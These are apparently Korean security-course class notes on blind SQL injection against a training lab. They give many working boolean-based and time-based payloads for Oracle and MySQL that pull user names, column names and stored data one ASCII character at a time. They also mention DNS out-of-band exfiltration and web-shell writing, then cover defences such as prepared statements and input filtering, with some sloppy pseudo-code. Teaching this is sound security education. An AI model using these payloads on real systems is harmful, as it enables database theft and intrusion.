3일차

Blind SQL Injection
공격 결과가 화면에 안나오는 거

1. 쿼리문 유추 &lt;-
2. 공격포인트
   qq 
   qq%' 
3. 테이블
  3-1. 개수
  3-2. 1 row씩
    3-2-1. 글자수
    3-2-2. 한글자씩 아스키
4. 컬럼
  4-1. 
  4-2. 
    4-2-1. 
    4-2-2. 
5. 데이터
 5-1
 5-2
   5-2-1.
   5-2-2.

user


1. 쿼리문 유추 
select 컬럼들 from 자유게시판 where 제목 like '%ad%' 

https://lab.eqst.co.kr:8442/exam4/free?
page=1
sorting=
sortingAd=
startDt=2025-09-15
endDt=2025-09-26' and/or
searchType=all
keyword= &lt;- 안됐어 
https://lab.eqst.co.kr:8442/exam4/free?page=1&amp;sorting=title&amp;sortingAd=DESC&amp;startDt=2025-09-15&amp;endDt=2025-09-26&amp;searchType=all&amp;keyword=ad%25%27+and++%28select+length%28user%29+from+dual%29%3E0+and+%27j%25%27%3D%27j

select * from 게시판 where 글쓴날짜 &gt; '2025-09-24' and ' and 글쓴날짜 &lt; '2025-09-26'
order by __sorting__ __sortingAd__


2. 공격포인트 
  ad 결과 
  ad%' or 'j'='j
  
  검색어 :  ad%' and  [공격쿼리] and 'j%'='j

3. 유저명 
  select user from dual
  
  3-1. 글자수: 4글자 
      length()

      (select length(user) from dual)&gt;0
      (select length(select user from dual) from dual) &gt; 0

    검색어 :  ad%' and  [공격쿼리] and 'j%'='j
    검색어 :  ad%' and  (select length(user) from dual)&gt;0 and 'j%'='j

  3-2. 한글자씩 아스키 
     substr(문자열, 몇번째, 몇개)
     ascii(문자)
     (select ascii(substr(user, 1, 1)) from dual) &gt; 0

     검색어 :  ad%' and  [공격쿼리] and 'j%'='j

     검색어 :  ad%' and  (select ascii(substr(user, 1, 1)) from dual) &gt; 0 and 'j%'='j
     1~127 -&gt; 실제문자 32~126

     1: 73 
     2: 78
     3: 70
     4: 54

gpt -&gt; 고급지게 공격구문 짜보겠다 

   유저명중에서 @ 앞까지

   

length -&gt; 18
rookies26 &lt;-   @234.23.10.234


==================================
* SQL Injection MySQL 문제 4번    -&gt; 11시 10분 풀이~
==================================
1. 풀이 과정 
2. 정답
==================================

Oracle VS MySQL

length    length
substr    substr/substring
user      user()
아이디만    아이디+@아이피
ascii     ascii

Intruder 써보실 분들은 써보세요   아스키 = {85} 
 -&gt; 근데 손으로 업/다운 게임하는게 더빠름 

-&gt; user @ &lt;- 계정

length(계정ID @ 앞까지만) &lt;- 길이 

=================================
* SQL Injection Oracle 문제 5번 - 40분에 풀이~
=================================
1. 풀이 과정 
2. 정답

- 테이블명 ANSWER
  -&gt; 컬럼명부터 탈취하기 시작하면 됩니다.
==================================

1. 쿼리문 유추 
2. 공격포인트 
3. 테이블 : ANSWER 
4. 컬럼 
   select column_name from cols where table_name = 'ANSWER'
v   4-1. 컬럼의 개수: 
   select count(column_name) from cols where table_name = 'ANSWER'
   4-2. 1 row씩: 
   select c from (select column_name c, rownum l from cols where table_name = 'ANSWER') where l = 1
v    4-2-1. 글자수: 
      select length(c) from (select column_name c, rownum l from cols where table_name = 'ANSWER') where l = 1
v    4-2-2. 한글자씩 아스키 :
      select ascii(substr(c,1~글자수,1)) from (select column_name c, rownum l from cols where table_name = 'ANSWER') where l = 99
5. 데이터 탈취:
   select 탈취한테이블명 from ANSWER 
   5-1. 데이터 개수: 
   select count(탈취한테이블명) from ANSWER 
   5-2. 1row씩: 
   select a from (select 탈취한테이블명 a, ronwum b from ANSWER) where b = 1~개수 
   5-2-1. 글자수: 
   select length(a) from (select 탈취한테이블명 a, ronwum b from ANSWER) where b = 1~개수 
   5-2-2. 한글자씩 아스키:
   (select ascii(substr(a,1~글자수,1)) from (select 탈취한테이블명 a, ronwum b from ANSWER) where b = 1~개수) &gt; 0


================================= 
* 쇼핑몰 문제 1번 - DB:Oracle
=================================
1. 풀이과정
 1) 쿼리문 유추 
 2) 공격 포인트 
 3) 유저명 
  3-1) 유저명 글자수 
  3-2) 유저명 한글자씩
2. 정답
=================================
- Hint 1 : 검색창에 공격하는거 아님
- Hint 2 : 공격포인트를 찾고 쿼리문을 유추!&lt;-
- Hint 3 : 상품상세 practice/practice01/detail?id=__사용자입력값__ &lt;- 요기다가 공격!!
- Hint 4 : 따옴표 안씀. 숫자형!
=================================
- 400 Bad Request -&gt; Burp 
ctrl+u -&gt; 최소한의 인코딩 
 드래그-&gt; 우클릭-&gt; convert select -&gt; url encode -&gt; all character &lt;-
 버프스위트 decoder탭 -&gt; &lt; &gt; -&gt; encode -&gt; url 
  ) %3e 0
 &gt; &lt; 이런걸 인코딩 안해줌 
 ) &gt; 0 ?
 | &lt;-



회원가입&amp;로그인 안하고 공격이 가능합니다.
-&gt; 페이지 상단에 문제 표기가 되어 있는 페이지에서만 공격 가능.

유저명 -&gt; 데이터를 꺼내는게 중요한게 아님 


* MySQL 4번 

1. 쿼리문 유추 
  select 컬럼들 from 공지사항 where 제목 like '%cc%' or ''='%'

2. 공격포인트 
검색어 : cc%' and   (공격구문)  and 

3. 유저명 
@ &lt;- 앞까지만 
SELECT SUBSTRING_INDEX(USER(), '@', 1)
  3-1. 글자수 : @앞까지의 계정ID 5글자
    (SELECT length(SUBSTRING_INDEX(USER(), '@', 1))) &gt; 0

    검색어 : cc%' and   (공격구문)  or ''='
    검색어 : cc%' and  (SELECT length(SUBSTRING_INDEX(USER(), '@', 1))) &gt; 0  or ''='

cc%' and  (SELECT length(SUBSTRING_INDEX(USER(), '@', 1))) = 5  or ''='

  3-2. 1글자씩 아스키 

  (select ascii(substring(user(),1,1))) &gt; 0

  검색어 : cc%' and   (공격구문)  or ''='
  검색어 : cc%' and  (select ascii(substring(user(),1,1))) &gt; 0  or ''='

  1: 105
  2: 110
  3: 102
  4: 111
  5: 115

##############################
         명예의 전당
##############################         
       [   김수민   ]
       [   손성민   ]     
       [   백상준   ]            
       [   주혜련   ]  
       [   오준서   ]
       [   박종원   ]
       [   조영규   ]
       [   추시현   ]
       [   이석진   ]
       [   이동은   ]
##############################



select 컬럼 from member where rownum = 1
id &lt;- 회원번호 안뽑으셔도 돼요~
패스워드 &lt;- 크래킹 X

-&gt; 쇼핑몰 1번 회원가입한 사람 첫번째 사람의 개인정보를 털어주시면 됩니다.


* 오라클 5번 
1. 쿼리문 

  select 컬럼들 from 자유게시판 where 제목/내용/글쓴이 like '%__검색어__%'

2. 공격포인트 

  pppp 
  pppp%' or 'z'='

  검색어 : pppp%' AND (공격쿼리) or 'z'='

3. 테이블명 : ANSWER &lt;- 대문자  
4. 컬럼명 
  select column_name from user_tab_columns where table_name = 'ANSWER'
  4-1. 개수 : 5개
  (select count(column_name) from user_tab_columns where table_name = 'ANSWER') &gt; 0
   검색어 : pppp%' AND (공격쿼리) or 'z'='
    검색어 : pppp%' AND (select count(column_name) from user_tab_columns where table_name = 'ANSWER') &gt; 0 or 'z'='
  4-2. 1 row씩 
   (select c from (select column_name c, rownum r from user_tab_columns where table_name = 'ANSWER')
   where r = 1) = 'ANSWER'
검색어 : pppp%' AND (공격쿼리) or 'z'='
검색어 : pppp%' AND (select c from (select column_name c, rownum r from user_tab_columns where table_name = 'ANSWER') where r = 1) = 'ANSWER' or 'z'='


     4-2-1. 몇글자:

     (select length(c) from (select column_name c, rownum r from user_tab_columns where table_name = 'ANSWER') where r = 1) &gt; 0

     검색어 : pppp%' AND (공격쿼리) or 'z'='
     검색어 : pppp%' AND (select length(c) from (select column_name c, rownum r from user_tab_columns where table_name = 'ANSWER') where r = 1) &gt; 0 or 'z'='
 
    1: 6글자
 
     4-2-2. 한글자씩 아스키:    
    (select ascii(substr(c,1,1)) from (select column_name c, rownum r from user_tab_columns where table_name = 'ANSWER') where r = 1) &gt; 0

    
   ANSWER 컬럼명

5. 정답
 select answer from answer &lt;-

 5-1. 개수: 1개 
 (select count(answer) from answer) &gt;0

 5-2-1. 글자수 : 4글자
  (select length(answer) from answer) &gt; 0
 5-2-2. 한글자씩 아스키 
   (select ascii(substr(answer,1~4,1)) from answer) &gt; 0

 1: 97
 2: 110
 3: 116
 4: 54


 https://lab.eqst.co.kr:8110/practice/practice01/l

https://lab.eqst.co.kr:8110/practice/practice01/detail?id=__사용자입력값__

 https://lab.eqst.co.kr:8110/practice/practice01/detail?id=61



 1. 쿼리문 유추 

 select * from 상품 where 상품명 like '%__검색어__%'

 select * from 상품상세 where 상품번호 like '%61%'&lt;-
   6611
   1612
   1161

 select * from 상품상세 where 상품번호 = '__번호__' 

 61              -&gt; 
 61' and 'k'='k  -&gt;

 select * from 상품상세 where 상품번호 = __번호__ and (공격구문)
 select * from 상품상세 where 상품번호 = 61 or 3=5
                                         61 and 10=10
                                        
    id: 61
     61 = 61.0 참 
     '61' = '61.0' 거짓 
  

    숫자형 ? -&gt; 연산 
    '62-1' -&gt; 상품 
    62-1=61&lt;-
==============


* 쇼핑몰 문제 1번 풀이
1. 쿼리문 유추 
select 컬럼 from 상품상세 where 상품번호=__입력값__ 

2. 공격포인트 
 61 
 61 or 2=3
 id: 61 and (공격쿼리)

3. 유저명 
select user from dual
user
 3-1. 몇글자: 8글자
 61 and length(user()) &gt; 0
 3-2. 한글자씩 ascii 
 61 and ascii(substr(user, 1,1)) &gt; 0

  
1: 85 
2: 83 
3: 69
4: 87
5: 79
6: 82
7: 76
8: 68

USEWORLD

================================
* 대응방안 
1. Prepared Statement 라는걸 사용하면 됩니다.
   Statement 

statment -&gt; 쿼리문을 작성 실행 

/search?검색어=멍멍

1. Statement
@RequestMapping("/search")
public function String search(@param 검색어) {
    statement st = new statement()
    db.connect("192.168.0.20","admin","1234", "free")
    st.query = "select name, addr, hobby from friends where name like '%" + __검색어__ + "%'';
    result = db.execute(st)
    reutrn result;
}

2. Prepared Statement &lt;- 보안 전혀 관계없음 -&gt; DB 성능을 끌어올리려고 
 -&gt; 속도를 위해서 만든 기능인데 -&gt; 인젝션 100% 안전한 보안 대응 방안
@RequestMapping("/search")
public function String search(@param 검색어) {
    PreparedStatement ps = new Preaparedstatement()
    db.connect("192.168.0.20","admin","1234", "free")
    ps.query = "select name, addr, hobby from friends where name like '%?%'"
    ps.bind(1, 검색어)
    result = db.execute(st) 
    reutrn result;
}

면접: sql injection 의 대응방안이 뭔가요?
      prepared statement 사용하면 됩니다~ 
      컬럼이랑 테이블에 바인딩 안되는거 잘 알고있어? &lt;-

    그러면 그거쓰면 100% 완전히 안전해요? 
    네: 제대로만 쓰면 완벽하게 안전합니다.
    아니오: 잘못쓰면 저걸 써도 뚫려요.

test.com/board?boardid=notice where 조건 --&amp;keyword=공격안댐
1)
ps.query = "select title, content from " + boardid + " where 제목 like ?";

if  boardid == notice
ps.query = "select title, content from notice where 제목 like ?";
if  board == qna
ps.query = "select title, content from qna where 제목 like ?";
else:
  에러처리시켜


2) 정렬 

sorting=
sortingAd=
keyword=

"select title, content from board where title like ? order by" + sorting + " " + sortingAd 

bind(1, keyword)

select  0from 0 where 0  order by 

case when 조건 then 참일때 else 거짓일때 end
숫자형 인젝션 심화 
case when 공격쿼리 then 숫자 else 2/0 end 


if 조건: 
   참일때 
else:
   거짓일때




-&gt; 에러가나요 

-&gt; 컬럼이랑 테이블이랑 고정시켜서 미리 컴파일




2. 사용자 입력값 검증 
   
  1) Whitelist 
  일단 아무것도안돼
  오로지 내가 지정해놓은 '요것들'만 돼!
  회원번호 [   ]  검색
  숫자말고는 아무것도 못쓰게해 
  너 처리안해줘.
  if id가 숫자가 아니면:
    싹다 에러처리 
  else:
     select * from member where id = __회원번호__

  2) Block/Blacklist Filtering 
  아무거나 다 쳐도되는데 '요것들'은 안돼!
  모든 파라미터들 -&gt; 사용자 입력값으로 서버에서 생각 
  공격구문을 사용할 수 없도록 필터링
  ' = () 특수문자들 막는거 
  select from union ctx dr xml &lt;-
  ( ) 
   검색 : 가 뭐하는거에요?
   select 사용법

   ' -&gt; ''

   홍길동's 아이폰  -&gt; escape 
  
  insert into friends(name, addr) value ('홍길동\'s 아이폰' )


2. Blind -&gt; Time-based SQL Injection -&gt; 실무에서 안씀 -&gt; 서버가 노후화 -&gt; DB 서버가 터집니다.
  실무 X 

  select * from friends where name like '%멍멍%' and (처리하는데 겁나~오래걸리는 쿼리문)                             and  'p%'='p%'


  select * from friends where name like '%멍멍%' and (select * from all_tables t1, all_tables t2, all_tables t3, all_tables t4)=1 and    length(user) &gt; 0    and  'p%'='p%'

  검색어 :  멍멍%' and (select * from all_tables t1, all_tables t2, all_tables t3, all_tables t4)=1 and    length(user) &lt; 0    and  'p%'='p

참일때는 웹페이지가 쫌 늦게떠요
거짓이면 웹페이지가 바로떠요 
 
 인터넷 속도에따라 

  Thread.sleep(2000)

3. OOB Test -&gt; Out-of-band Test 
   공격자서버 이용해서 DB데이터를 탈취 

test.com -&gt; 
test.com -&gt; dns query -&gt; 223.19.239.9 -&gt; 
utl_inaddr.get_host_addres("도메인") -&gt; ip를 확인해줘.
 nslookup 계정id.seyong.kr

4. OS Command Injection 
  함수 Stored Procedure 중에서 
  DB -&gt; os 명령을 실행하는 

5. 파일을 생성 
  /var/www/html/webapps/index.jsp &lt;- 웹쉘
===========================================
한글!
================



===========================================
SQL Injection 
=======
  -&gt; 노가다를 하기 싫어 -&gt; 자동화 
  파이썬 자동화 공격 스크립트 


* 쇼핑몰 1번 첫번째사람 개인정보 -&gt; 이름 

select name from member where rownum = 1

db -&gt; 한글1글자를 2바이트-&gt; 
홍길동 -&gt; length('홍길동') -&gt; 3글자

1. 글자수 : 3글자

61 and (select length(name) from member where rownum = 1) &gt; 5

2. 한글자씩 ascii 
61 and (select ascii(substr(name,1,1)) from member where rownum = 1) &gt; 5

URL Encoding
1: 15382912
2: 15500472
3: 15506089

한글 1글자가
%00%00%00 &lt;-
%ea%b9%80 %ec%84%b8 %ec%9a%a9 

==========================================

언어 1개정도는 대충은 할줄알아야 
이런식으로 구현~&lt;-
ai -&gt; 내가 보고 뭐하는건지 알정
소스코드를 볼수있는 능력
=========================================

문법 : 대괄호, 중괄호 X 들여쓰기 -&gt; ;없다
       ' " 혼용이 가능하다.

1. 선언
a = 1
b = 'asdf'
b = "asdf" 
a + b (X)
str(a) + b 
f"{a}{b}"
"{}{}".format(a,b)

def 함수(인자):
__ asdf
asdf
  return 

a = ['a','b','c','d']  
a[0]&lt;-'a'
a[3]&lt;-'d' 

a = {
    '키':'값',
    '키':'값',
    [    ],
     { 
        'ㅁㄴㅇㄹ'

     }
}
a["키"] &lt;-'값'

2. 입출력
입력 
a = input("메시지: ") &lt;- 무조건 문자열 1
a = '1'
a = "홍길동's  아이폰"
a = '홍길동\'s  아이폰'
출력 
print(변수/문자열)

3. 조건
if 조건:
__ 참이면할거
else: 
__ 거짓이면할거

4. 반복
for(var i = 0; i&lt;10; i++ ) {
    a[i]
}

for b in a:
__ 할거 

for i in range(0,10):
    0~9까지 할거

==================================





import requests 

print("hi")

no module 

&gt; pip install requests 
</pre><div class="info">© 2025 Seyong Kim. All Rights Reserved.</div></div></body></html>